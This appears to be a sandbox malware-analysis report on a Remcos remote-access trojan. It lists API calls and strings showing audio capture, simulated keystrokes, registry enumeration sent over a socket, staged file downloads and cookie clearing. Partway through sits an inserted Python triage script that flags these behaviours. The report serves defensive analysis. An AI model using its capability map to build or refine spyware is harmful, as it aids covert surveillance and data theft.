                                    • Instruction Fuzzy Hash: 383181315043019FC324EB21DD46A9A77A8EB84314F40443EF18DA21F2EFB89A49CB5E
                                    Uniqueness Score: -1.00%

                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00410E6E
                                    • int.LIBCPMT ref: 00410E81
                                      • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                      • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                    • std::_Facet_Register.LIBCPMT ref: 00410EC1
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00410ECA
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00410EE8
                                    • __Init_thread_footer.LIBCMT ref: 00410F29
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                    • String ID: ,kG$0kG
                                    • API String ID: 3815856325-2015055088
                                    • Opcode ID: e0f3714a3daeaf8b288ae2a542907f179217b7f89c568a0a8b7367a1e9159da3
                                    • Instruction ID: 12cf7b7900226bd12227407fb3b1cbab205c4dd0745ae636880afd2a72082c2f
                                    • Opcode Fuzzy Hash: e0f3714a3daeaf8b288ae2a542907f179217b7f89c568a0a8b7367a1e9159da3
                                    • Instruction Fuzzy Hash: 162134329005249BC704EB6AD9428DE37A8EF48324F20056FF804A72D1DBB9AD81CB9D
                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                    • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                                    • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                    • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                    • waveInStart.WINMM ref: 00401CFE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                    • String ID: dMG$|MG$PG
                                    • API String ID: 1356121797-532278878
                                    • Opcode ID: f67d326050ea03177529252cfca037bf538e61c655dad41bf55bf31ac8308c8f
                                    • Instruction ID: ba088f7df0b955e0db37e5e5e2d8d6799d5f59e9c832501e8260ac80857d70f0
                                    • Opcode Fuzzy Hash: f67d326050ea03177529252cfca037bf538e61c655dad41bf55bf31ac8308c8f
                                    • Instruction Fuzzy Hash: 53212A71604201AFC739DF6AEE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476
                                      • Part of subcall function 0041D50F: RegisterClassExA.USER32(00000030), ref: 0041D55B
                                      • Part of subcall function 0041D50F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                                      • Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580
                                    • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
                                    • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
                                    • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
                                    • TranslateMessage.USER32(?), ref: 0041D4E9
                                    • DispatchMessageA.USER32(?), ref: 0041D4F3
                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D500
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                    • String ID: Remcos
                                    • API String ID: 1970332568-165870891
                                    • Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                    • Instruction ID: 4ccd8a34d55b2cf311069b5b9598b364b65d9d4e2968dcdf9eb94a5ca0393a4d
                                    • Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                    • Instruction Fuzzy Hash: AC015271800245EBD7109FA5EC4CFEABB7CEB85705F004026F515930A1D778E885CB98
                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7e166faf4fed60888f6d9a5ae5c37c00b97c36b417cf054fc87f790b28aa2c34
                                    • Instruction ID: c2c0890efeac2311cc0422bbb5d66c498191acafde20d8af94b1f6b0c86a236e
                                    • Opcode Fuzzy Hash: 7e166faf4fed60888f6d9a5ae5c37c00b97c36b417cf054fc87f790b28aa2c34
                                    • Instruction Fuzzy Hash: 5AC1D770D04249AFEF11DFA9C881BAEBBB4EF09314F18415AE914A7392C77C9D41CB69
                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                    • _memcmp.LIBVCRUNTIME ref: 00445423
                                    • _free.LIBCMT ref: 00445494
                                    • _free.LIBCMT ref: 004454AD
                                    • _free.LIBCMT ref: 004454DF
                                    • _free.LIBCMT ref: 004454E8
                                    • _free.LIBCMT ref: 004454F4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorLast$_abort_memcmp
                                    • String ID: C
                                    • API String ID: 1679612858-1037565863
                                    • Opcode ID: 9a230522b66ee103f0b5d02c6619ea6d7647dc78be8ff38f2db07545005a246d
                                    • Instruction ID: 551747f29a431029642ca2aca46be5bbca0cbe6c77a4b2ed9ddfbf6361621c56
                                    • Opcode Fuzzy Hash: 9a230522b66ee103f0b5d02c6619ea6d7647dc78be8ff38f2db07545005a246d
                                    • Instruction Fuzzy Hash: B2B13975A016199BEB24DF18C884BAEB7B4FF08308F5045EEE949A7351E774AE90CF44
                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: tcp$udp
                                    • API String ID: 0-3725065008
                                    • Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                    • Instruction ID: c6aeaafd44a905d145cb4251883953767b251f71b123717361be5a5837da4da2
                                    • Opcode Fuzzy Hash: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                    • Instruction Fuzzy Hash: 637177B06083028FDB24CF65C480BABB7E4AFD4395F15442FF88986351E778DD858B9A
                                    Uniqueness Score: -1.00%

                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 004018BE
                                    • ExitThread.KERNEL32 ref: 004018F6
                                    • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                                      • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                    • String ID: PkG$XMG$NG$NG
                                    • API String ID: 1649129571-3151166067
                                    • Opcode ID: 35cc2389ebfe272c336abe6e4262d0590b1cbf8cf5c64226a292135f06eab632
                                    • Instruction ID: 5b8630810f78da979eb204bf693be1d55f2004797ab3201abec5cd50ea38d472
                                    • Opcode Fuzzy Hash: 35cc2389ebfe272c336abe6e4262d0590b1cbf8cf5c64226a292135f06eab632
                                    • Instruction Fuzzy Hash: BF41B4312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D49C75E
                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FA4,?,00000000,00407FFC,00000000), ref: 004079C5
                                    • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A0D
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    • CloseHandle.KERNEL32(00000000,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A4D
                                    • MoveFileW.KERNEL32(00000000,00000000), ref: 00407A6A
                                    • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407A95
                                    • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5
                                      • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                                      • Part of subcall function 00404B96: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                    • String ID: .part
                                    • API String ID: 1303771098-3499674018
                                    • Opcode ID: d529a156e2d4aa638270efb6cac6cc48bb231fa92e7fccec4ec34662e1436a09
                                    • Instruction ID: 3872d967715c28256f57216ae0d43a20e9ded80e7ed52efebe816600842ab993
                                    • Opcode Fuzzy Hash: d529a156e2d4aa638270efb6cac6cc48bb231fa92e7fccec4ec34662e1436a09
                                    • Instruction Fuzzy Hash: 7F318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044ACA3
                                    • __alloca_probe_16.LIBCMT ref: 0044ACDB
                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044AD29
                                    • __alloca_probe_16.LIBCMT ref: 0044ADC0
                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AE23
                                    • __freea.LIBCMT ref: 0044AE30
                                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                    • __freea.LIBCMT ref: 0044AE39
                                    • __freea.LIBCMT ref: 0044AE5E
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                    • String ID:
                                    • API String ID: 3864826663-0
                                    • Opcode ID: 12305b3b87d107202002273903900b71ffd2ccf102546581680d8e37d1659883
                                    • Instruction ID: b5b01290aead076256688b5938d42e4b2a7c64905c3dece0b68445a47d4ef5f6
                                    • Opcode Fuzzy Hash: 12305b3b87d107202002273903900b71ffd2ccf102546581680d8e37d1659883
                                    • Instruction Fuzzy Hash: 1F513A72680206AFFB258F64CC41EBF77AAEB44714F24462EFC14D6240EB38DC60875A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004199CC
                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004199ED
                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A0D
                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A21
                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A37
                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A54
                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A6F
                                    • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00419A8B
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: InputSend
                                    • String ID:
                                    • API String ID: 3431551938-0
                                    • Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                    • Instruction ID: babcb3f23bbfeda7ed9031f98f3524dfd9ae94bb4b0c65128b251ed995bccade
                                    • Opcode Fuzzy Hash: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                    • Instruction Fuzzy Hash: CE31B471558349AEE310CF51DC41BEBBBDCEF98B54F00080FF6808A181D2A6A9C88B97
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: __freea$__alloca_probe_16_free
                                    • String ID: a/p$am/pm$zD
                                    • API String ID: 2936374016-2723203690
                                    • Opcode ID: f0859f4b60942e64c2417795a0aa154076776a6c217ac3e68ed0847ac231e996
                                    • Instruction ID: 9fbfa546a4d6e8c17a1525f8bb1fcc11d6b56032d3bbc67104e2604220ae0e85
                                    • Opcode Fuzzy Hash: f0859f4b60942e64c2417795a0aa154076776a6c217ac3e68ed0847ac231e996
                                    • Instruction Fuzzy Hash: 6AD1D1B1918206CAFB249F68C845ABBB7B1FF05310F28415BE545AB351D33D9D43CBA9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                                    • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413B8B
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: Enum$InfoQueryValue
                                    • String ID: [regsplt]$xUG$TG
                                    • API String ID: 3554306468-1165877943
                                    • Opcode ID: 7e2048b5b4a15889db9c74ac39567fdb59dd46086023709b3913aff4f04af58e
                                    • Instruction ID: b9c9d149d6e4de0395087b00820169330fa190b61d8fc59f93bff107e3475f49
                                    • Opcode Fuzzy Hash: 7e2048b5b4a15889db9c74ac39567fdb59dd46086023709b3913aff4f04af58e
                                    • Instruction Fuzzy Hash: E5511D72900219AADB11EB95DC85EEFB77DAF04305F10007AF505F6191EF786B48CBA9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044BB31,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B3FE
                                    • __fassign.LIBCMT ref: 0044B479
                                    • __fassign.LIBCMT ref: 0044B494
                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
                                    • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000,?,?,?,?,?,?,?,?,?,0044BB31,?), ref: 0044B4D9
                                    • WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000,?,?,?,?,?,?,?,?,?,0044BB31,?), ref: 0044B512
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                    • String ID:
                                    • API String ID: 1324828854-0
                                    • Opcode ID: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                    • Instruction ID: 24f44d390d373c30b0d8a34eda065edd0bccebe0da4884afe324d1cece3cc5ea
                                    • Opcode Fuzzy Hash: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                    • Instruction Fuzzy Hash: 0751D270900208AFDB10CFA8D885AEEFBF4EF09305F14856BE955E7292D734D941CBA9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: _free
                                    • String ID: D[E$D[E
                                    • API String ID: 269201875-3695742444
                                    • Opcode ID: bc4a191701c62eeb9847f09c94d148ade9b95fc5d58c951cd89fb7ba37de2388
                                    • Instruction ID: e1ec1e089ae9cf4c30c2343e7c59e1c9a5dba52e91c7d03f0b1416238821c5a9
                                    • Opcode Fuzzy Hash: bc4a191701c62eeb9847f09c94d148ade9b95fc5d58c951cd89fb7ba37de2388
                                    • Instruction Fuzzy Hash: 7A415B31A001046BEB216BBA8C4566F3BB4EF41336F96061BFC24D7293DA7C880D566D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D46
                                      • Part of subcall function 00413A55: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                      • Part of subcall function 00413A55: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    • RegCloseKey.ADVAPI32(00000000,004660A4,004660A4,00466468,00466468,00000071), ref: 00413EB4
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: CloseEnumInfoOpenQuerysend
                                    • String ID: xUG$NG$NG$TG
                                    • API String ID: 3114080316-2811732169
                                    • Opcode ID: 33ae2b509f9f16c0ffb344733dc4e49a524601993d0187366b37a5b307e1f339
                                    • Instruction ID: 865164b8d80166fcad8b4517e5ed4c9fbafb7c73de3830c3e78154838722fbed
                                    • Opcode Fuzzy Hash: 33ae2b509f9f16c0ffb344733dc4e49a524601993d0187366b37a5b307e1f339
                                    • Instruction Fuzzy Hash: 0B419E316082405BC324F726DC56AEF72959FD1348F40883FF54A671D2EF7C5949866E
                                    Uniqueness

                                    Uniqueness Score: -1.00%
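The two function blocks above (the write-then-rename at 004079C5 whose only string is `.part`, and the registry walk at 00413D46 that reaches send() through subcall 00404AA1) can be triaged mechanically from the API lines the report prints. The following Python is an added example, not Joe Sandbox code and not code recovered from the sample: it parses the `• Api.MODULE(args), ref: addr` lines and the `$`-joined String ID field, then flags the two behaviours. The flag names are this example's own; the two sample blocks embedded in it are copied from the report.

```python
"""Triage helper for this report's function blocks (added example; not part of
the Joe Sandbox output or of the Remcos sample). It parses the API reference
lines and the '$'-joined String ID field and flags two behaviours shown above:
a WriteFile -> MoveFileW staging with a '.part' string, and registry
enumeration that shares a function with a WS2_32 send()."""
import re
from dataclasses import dataclass
from typing import Optional

# One API reference line. The 'Part of subcall function X:' prefix and the
# argument list are optional (CRT helpers such as __freea.LIBCMT print no args).
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[^\s.(]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: list                         # operands as printed; '?' = unresolved by the sandbox
    ref: int                           # address of the call site
    subcall_of: Optional[str] = None   # callee address when the line is a subcall entry


def parse_api_line(line: str) -> Optional[ApiCall]:
    """Return an ApiCall for an API reference line, None for any other line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = [a.strip() for a in raw.split(",")] if raw else []
    return ApiCall(m.group("name"), m.group("module"), args,
                   int(m.group("ref"), 16), m.group("sub"))


def parse_block(text: str) -> list:
    """Parse every API line of one function block, keeping the report's order."""
    return [c for c in (parse_api_line(l) for l in text.splitlines()) if c]


def split_string_id(string_id: str) -> list:
    """The report joins a function's string references with '$'."""
    return [s for s in string_id.split("$") if s]


def flags_staged_write(calls: list, strings: list) -> bool:
    """WriteFile before MoveFileW in the function body plus a '.part' string:
    the download is written under a temporary name and renamed when complete."""
    names = [c.name for c in calls if c.subcall_of is None]
    if "WriteFile" not in names or "MoveFileW" not in names:
        return False
    ordered = names.index("WriteFile") < names.index("MoveFileW")
    return ordered and any(s.lower().endswith(".part") for s in strings)


REG_ENUM = {"RegEnumKeyExA", "RegEnumKeyExW", "RegEnumValueA", "RegEnumValueW", "RegQueryInfoKeyW"}
NET_SEND = {"send", "sendto", "WSASend"}


def flags_registry_exfil(calls: list) -> bool:
    """Registry enumeration and a socket send reachable from one function.
    Subcall lines count: the send() above is reached through function 00404AA1."""
    names = {c.name for c in calls}
    return bool(names & REG_ENUM) and bool(names & NET_SEND)


def triage(block_text: str, string_id: str) -> dict:
    calls = parse_block(block_text)
    strings = split_string_id(string_id)
    return {"calls": [c.name for c in calls],
            "staged_write": flags_staged_write(calls, strings),
            "registry_exfil": flags_registry_exfil(calls)}


# Sample input: the API lines of two function blocks, copied from this report.
PART_BLOCK = """\
• CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FA4,?,00000000,00407FFC,00000000), ref: 004079C5
• WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A0D
  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
• CloseHandle.KERNEL32(00000000,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A4D
• MoveFileW.KERNEL32(00000000,00000000), ref: 00407A6A
• CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407A95
• DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5
"""
REG_BLOCK = """\
• RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D46
  • Part of subcall function 00413A55: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
  • Part of subcall function 00413A55: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
• RegCloseKey.ADVAPI32(00000000,004660A4,004660A4,00466468,00466468,00000071), ref: 00413EB4
"""

if __name__ == "__main__":
    print(triage(PART_BLOCK, ".part"))
    print(triage(REG_BLOCK, "xUG$NG$NG$TG"))
```

Subcall lines are kept, tagged with their callee address, because the report attributes send() to function 00404AA1 rather than to the block itself; dropping them would hide the registry-to-socket path. Operands printed as `?` are left as-is rather than guessed, so any decoding (for example 00020019 as KEY_READ in the RegOpenKeyExW line) has to check for them first.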

                                    APIs
                                      • Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 0041363D
                                      • Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
                                      • Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665
                                      • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                    • _wcslen.LIBCMT ref: 0041B763
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                    • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                    • API String ID: 37874593-122982132
                                    • Opcode ID: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
                                    • Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
                                    • Opcode Fuzzy Hash: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
                                    • Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 004135A6: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                      • Part of subcall function 004135A6: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                      • Part of subcall function 004135A6: RegCloseKey.KERNELBASE(?), ref: 004135F2
                                    • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BF6B
                                    • PathFileExistsA.SHLWAPI(?), ref: 0040BF78
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                    • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                    • API String ID: 1133728706-4073444585
                                    • Opcode ID: c4bf94da8be876f49cea7471f0be2422906d591350fd81deebf31ce2b361b3bc
                                    • Instruction ID: 11f9a5ab4d81baf10890d677fe2d2a0774849eb970c5828eb217b404dd8a17fe
                                    • Opcode Fuzzy Hash: c4bf94da8be876f49cea7471f0be2422906d591350fd81deebf31ce2b361b3bc
                                    • Instruction Fuzzy Hash: 38215271A4021AA6CB04F7B2CC569EE77699F10704F40017FE506B71D2EF7899498ADE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
